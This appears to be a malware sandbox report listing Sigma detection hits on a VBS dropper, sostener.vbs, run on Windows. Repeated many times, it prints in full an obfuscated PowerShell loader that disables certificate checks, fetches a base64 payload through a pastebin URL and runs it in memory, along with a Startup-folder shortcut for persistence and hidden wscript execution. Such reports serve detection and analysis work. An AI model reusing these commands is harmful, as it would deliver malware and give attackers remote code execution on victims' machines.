                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 
'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??
Source: File created | Author: Christopher Peacock '@securepeacock', SCYTHE | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6400, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, ProcessId: 6592, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( 
$LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??Tg
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, CommandLine: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2316, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs, ProcessId: 6592, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\', CommandLine: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\', CommandLine|base64offset|contains: r^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6400, ParentProcessName: powershell.exe, ProcessCommandLine: powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\', ProcessId: 1088, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 5604, ProcessName: wscript.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1088, TargetFilename: C:\Users\user\AppData\Local\Temp\sostener.vbs
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 
'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 
'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??
                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6400, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 
'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 5604, ProcessName: wscript.exe
